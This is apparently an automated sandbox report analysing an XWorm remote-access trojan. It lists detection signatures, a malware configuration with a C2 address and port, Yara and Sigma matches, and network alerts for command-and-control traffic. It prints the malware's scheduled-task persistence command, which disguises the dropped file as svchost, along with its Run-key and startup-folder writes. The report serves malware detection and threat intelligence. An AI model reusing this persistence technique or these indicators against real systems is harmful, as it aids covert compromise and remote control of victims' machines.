Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
WV7Gj9lJ7W.exe

Overview

General Information

Sample name:WV7Gj9lJ7W.exe
renamed because original name is a hash value
Original sample name:45b4e53e206933804c6febfcd5bddc27599c63aaaa2921afacc4d7f52a853f3a.exe
Analysis ID:1561588
MD5:f5869349b4c3c5902601673ccb454f8c
SHA1:0b164e7101927fe06ddbb98b0a85bdd7757f1734
SHA256:45b4e53e206933804c6febfcd5bddc27599c63aaaa2921afacc4d7f52a853f3a
Tags:exeuser-Chainskilabs
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected Telegram RAT
Yara detected Telegram Recon
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files with benign system names
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspect Svchost Activity
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • WV7Gj9lJ7W.exe (PID: 6880 cmdline: "C:\Users\user\Desktop\WV7Gj9lJ7W.exe" MD5: F5869349B4C3C5902601673CCB454F8C)
    • schtasks.exe (PID: 6208 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Local\Temp\svchost.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 6252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 1720 cmdline: C:\Users\user\AppData\Local\Temp\svchost.exe MD5: F5869349B4C3C5902601673CCB454F8C)
  • svchost.exe (PID: 7164 cmdline: "C:\Users\user\AppData\Local\Temp\svchost.exe" MD5: F5869349B4C3C5902601673CCB454F8C)
  • svchost.exe (PID: 5216 cmdline: "C:\Users\user\AppData\Local\Temp\svchost.exe" MD5: F5869349B4C3C5902601673CCB454F8C)
  • svchost.exe (PID: 2448 cmdline: C:\Users\user\AppData\Local\Temp\svchost.exe MD5: F5869349B4C3C5902601673CCB454F8C)
  • svchost.exe (PID: 3868 cmdline: C:\Users\user\AppData\Local\Temp\svchost.exe MD5: F5869349B4C3C5902601673CCB454F8C)
  • svchost.exe (PID: 984 cmdline: C:\Users\user\AppData\Local\Temp\svchost.exe MD5: F5869349B4C3C5902601673CCB454F8C)
  • svchost.exe (PID: 6044 cmdline: C:\Users\user\AppData\Local\Temp\svchost.exe MD5: F5869349B4C3C5902601673CCB454F8C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["127.0.0.1", "104.198.168.179"], "Port": 1337, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
WV7Gj9lJ7W.exeJoeSecurity_TelegramReconYara detected Telegram ReconJoe Security
    WV7Gj9lJ7W.exeJoeSecurity_XWormYara detected XWormJoe Security
      WV7Gj9lJ7W.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
        WV7Gj9lJ7W.exeJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          WV7Gj9lJ7W.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x10151:$s6: VirtualBox
          • 0x100af:$s8: Win32_ComputerSystem
          • 0x12db6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x12e53:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x12f68:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x11e33:$cnc4: POST / HTTP/1.1

          PCAP (Network Traffic)

          SourceRuleDescriptionAuthorStrings
          sslproxydump.pcapJoeSecurity_XWorm_1Yara detected XWormJoe Security

            Dropped Files

            SourceRuleDescriptionAuthorStrings
            C:\Users\user\AppData\Local\Temp\svchost.exeJoeSecurity_TelegramReconYara detected Telegram ReconJoe Security
              C:\Users\user\AppData\Local\Temp\svchost.exeJoeSecurity_XWormYara detected XWormJoe Security
                C:\Users\user\AppData\Local\Temp\svchost.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                  C:\Users\user\AppData\Local\Temp\svchost.exeJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                    C:\Users\user\AppData\Local\Temp\svchost.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                    • 0x10151:$s6: VirtualBox
                    • 0x100af:$s8: Win32_ComputerSystem
                    • 0x12db6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                    • 0x12e53:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                    • 0x12f68:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                    • 0x11e33:$cnc4: POST / HTTP/1.1

                    Memory Dumps

                    SourceRuleDescriptionAuthorStrings
                    00000000.00000002.4139603670.0000000012F51000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                      00000000.00000002.4139603670.0000000012F51000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                        00000000.00000002.4139603670.0000000012F51000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                        • 0x20bc9:$s6: VirtualBox
                        • 0x20b27:$s8: Win32_ComputerSystem
                        • 0x2382e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                        • 0x238cb:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                        • 0x239e0:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                        • 0x228ab:$cnc4: POST / HTTP/1.1
                        00000000.00000000.1688626641.0000000000C02000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                          00000000.00000000.1688626641.0000000000C02000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                            Click to see the 5 entries

                            Unpacked PEs

                            SourceRuleDescriptionAuthorStrings
                            0.0.WV7Gj9lJ7W.exe.c00000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                              0.0.WV7Gj9lJ7W.exe.c00000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                                0.0.WV7Gj9lJ7W.exe.c00000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                                  0.0.WV7Gj9lJ7W.exe.c00000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                                  • 0x10151:$s6: VirtualBox
                                  • 0x100af:$s8: Win32_ComputerSystem
                                  • 0x12db6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                                  • 0x12e53:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                                  • 0x12f68:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                                  • 0x11e33:$cnc4: POST / HTTP/1.1

                                  Sigma Signatures

                                  System Summary

                                  barindex
                                  Sigma detected: Files With System Process Name In Unsuspected Locations
                                  Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\WV7Gj9lJ7W.exe, ProcessId: 6880, TargetFilename: C:\Users\user\AppData\Local\Temp\svchost.exe
                                  Sigma detected: New RUN Key Pointing to Suspicious Folder
                                  Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\svchost.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\WV7Gj9lJ7W.exe, ProcessId: 6880, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost
                                  Sigma detected: Suspect Svchost Activity
                                  Source: Process startedAuthor: David Burkett, @signalblur: Data: Command: C:\Users\user\AppData\Local\Temp\svchost.exe, CommandLine: C:\Users\user\AppData\Local\Temp\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\svchost.exe, ProcessId: 1720, ProcessName: svchost.exe
                                  Sigma detected: System File Execution Location Anomaly
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Users\user\AppData\Local\Temp\svchost.exe, CommandLine: C:\Users\user\AppData\Local\Temp\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\svchost.exe, ProcessId: 1720, ProcessName: svchost.exe
                                  Sigma detected: CurrentVersion Autorun Keys Modification
                                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\svchost.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\WV7Gj9lJ7W.exe, ProcessId: 6880, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost
                                  Sigma detected: Startup Folder File Write
                                  Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\WV7Gj9lJ7W.exe, ProcessId: 6880, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk
                                  Sigma detected: Suspicious Schtasks From Env Var Folder
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Local\Temp\svchost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Local\Temp\svchost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\WV7Gj9lJ7W.exe", ParentImage: C:\Users\user\Desktop\WV7Gj9lJ7W.exe, ParentProcessId: 6880, ParentProcessName: WV7Gj9lJ7W.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Local\Temp\svchost.exe", ProcessId: 6208, ProcessName: schtasks.exe
                                  Sigma detected: Windows Processes Suspicious Parent Directory
                                  Source: Process startedAuthor: vburov: Data: Command: C:\Users\user\AppData\Local\Temp\svchost.exe, CommandLine: C:\Users\user\AppData\Local\Temp\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\svchost.exe, ProcessId: 1720, ProcessName: svchost.exe

                                  Persistence and Installation Behavior

                                  barindex
                                  Sigma detected: Schedule system process
                                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Local\Temp\svchost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Local\Temp\svchost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\WV7Gj9lJ7W.exe", ParentImage: C:\Users\user\Desktop\WV7Gj9lJ7W.exe, ParentProcessId: 6880, ParentProcessName: WV7Gj9lJ7W.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Local\Temp\svchost.exe", ProcessId: 6208, ProcessName: schtasks.exe

                                  Suricata Signatures

                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-11-23T21:05:09.461983+010028536851A Network Trojan was detected192.168.2.449731149.154.167.220443TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-11-23T21:05:22.397821+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:05:35.078050+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:05:35.451440+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:05:46.991636+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:05:59.267623+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:06:05.101176+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:06:11.549167+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:06:13.131562+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:06:14.643237+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:06:14.853519+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:06:20.167925+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:06:25.137384+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:06:25.347308+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:06:25.513261+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:06:30.676427+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:06:31.032166+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:06:35.112652+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:06:41.039461+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:06:41.453248+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:06:41.577525+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:06:51.654773+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:06:51.865118+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:06:52.611373+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:07:04.881338+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:07:05.114900+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:07:06.522645+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:07:08.971165+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:07:21.272547+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:07:26.353000+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:07:28.957630+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:07:30.374088+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:07:35.152096+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:07:35.583856+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:07:44.662640+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:07:47.910781+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:07:48.808516+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:07:55.471231+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:07:55.962843+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:08:04.155869+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:08:05.095467+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:08:06.675480+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:08:17.083526+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:08:27.724238+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:08:27.973037+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:08:28.743924+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:08:35.150293+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:08:37.728440+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:08:42.957033+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:08:48.144468+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:08:53.227048+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:08:57.895371+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:08:58.227147+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:09:04.665319+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:09:05.094644+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:09:06.781238+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:09:19.091410+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-11-23T21:05:22.465831+010028529231Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP
                                  2024-11-23T21:05:35.453664+010028529231Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP
                                  2024-11-23T21:05:46.994001+010028529231Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP
                                  2024-11-23T21:05:59.277702+010028529231Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP
                                  2024-11-23T21:06:11.559813+010028529231Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP
                                  2024-11-23T21:06:13.137609+010028529231Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP
                                  2024-11-23T21:06:14.645165+010028529231Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP
                                  2024-11-23T21:06:14.855413+010028529231Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP
                                  2024-11-23T21:06:20.174352+010028529231Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP
                                  2024-11-23T21:06:25.181200+010028529231Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP
                                  2024-11-23T21:06:25.360656+010028529231Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP
                                  2024-11-23T21:06:25.519507+010028529231Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP
                                  2024-11-23T21:06:30.678923+010028529231Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP
                                  2024-11-23T21:06:30.925272+010028529231Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP
                                  2024-11-23T21:06:31.034909+010028529231Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP
                                  2024-11-23T21:06:31.054378+010028529231Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP
                                  2024-11-23T21:06:41.533917+010028529231Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP
                                  2024-11-23T21:06:41.697319+010028529231Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP
                                  2024-11-23T21:06:51.658601+010028529231Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP
                                  2024-11-23T21:06:51.868469+010028529231Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP
                                  2024-11-23T21:06:52.613190+010028529231Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP
                                  2024-11-23T21:07:04.886631+010028529231Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP
                                  2024-11-23T21:07:06.524879+010028529231Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP
                                  2024-11-23T21:07:08.973095+010028529231Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP
                                  2024-11-23T21:07:21.275253+010028529231Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP
                                  2024-11-23T21:07:26.355168+010028529231Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP
                                  2024-11-23T21:07:28.959846+010028529231Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP
                                  2024-11-23T21:07:30.376164+010028529231Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP
                                  2024-11-23T21:07:35.592877+010028529231Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP
                                  2024-11-23T21:07:44.665162+010028529231Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP
                                  2024-11-23T21:07:47.913494+010028529231Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP
                                  2024-11-23T21:07:48.810715+010028529231Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP
                                  2024-11-23T21:07:55.473795+010028529231Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP
                                  2024-11-23T21:07:55.964678+010028529231Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP
                                  2024-11-23T21:08:04.165772+010028529231Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP
                                  2024-11-23T21:08:06.729947+010028529231Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP
                                  2024-11-23T21:08:06.899211+010028529231Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP
                                  2024-11-23T21:08:07.064909+010028529231Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP
                                  2024-11-23T21:08:17.086072+010028529231Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP
                                  2024-11-23T21:08:27.730954+010028529231Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP
                                  2024-11-23T21:08:27.975903+010028529231Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP
                                  2024-11-23T21:08:28.746440+010028529231Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP
                                  2024-11-23T21:08:37.730791+010028529231Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP
                                  2024-11-23T21:08:42.958984+010028529231Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP
                                  2024-11-23T21:08:43.203569+010028529231Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP
                                  2024-11-23T21:08:43.325613+010028529231Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP
                                  2024-11-23T21:08:48.149101+010028529231Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP
                                  2024-11-23T21:08:53.229056+010028529231Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP
                                  2024-11-23T21:08:57.984436+010028529231Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP
                                  2024-11-23T21:08:58.231872+010028529231Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP
                                  2024-11-23T21:09:04.667440+010028529231Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP
                                  2024-11-23T21:09:06.782274+010028529231Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP
                                  2024-11-23T21:09:19.092806+010028529231Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-11-23T21:05:35.078050+010028528741Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:06:05.101176+010028528741Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:06:35.112652+010028528741Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:07:05.114900+010028528741Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:07:35.152096+010028528741Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
